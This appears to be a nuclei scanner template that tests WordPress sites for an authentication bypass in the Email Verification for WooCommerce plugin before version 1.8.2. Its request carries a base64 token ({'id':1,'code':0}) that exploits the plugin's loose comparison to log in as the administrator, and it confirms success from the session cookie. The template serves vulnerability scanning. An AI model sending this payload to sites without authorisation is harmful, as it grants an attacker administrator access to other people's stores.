mirror of
https://github.com/projectdiscovery/nuclei-templates.git
synced 2026-02-04 01:33:21 +08:00
45 lines
1.5 KiB
YAML
45 lines
1.5 KiB
YAML
id: wp-woocommerce-email-verification
|
|
|
|
info:
|
|
name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass
|
|
author: random_robbie,daffianfo
|
|
severity: critical
|
|
description: |
|
|
Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator.
|
|
reference:
|
|
- https://wpvulndb.com/vulnerabilities/10318
|
|
- https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cwe-id: CWE-288
|
|
metadata:
|
|
max-request: 2
|
|
tags: woocommerce,wp,wpscan,wordpress,wp-plugin
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
|
|
- "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0="
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
part: header
|
|
regex:
|
|
- "wordpress_logged_in_[a-z0-9]{32}"
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Your account has been activated!"
|
|
- "From your account dashboard you can view your"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100aecf872414bff1e3fbbad4fa1f9e47774697d047a0ea76d8536a4c32fc6135bd022100888ae1ed5c383930164745cecfe45f9444b4578e459265cfb8965f50d1d95a5d:922c64590222798bb761d5b6d8e72950 |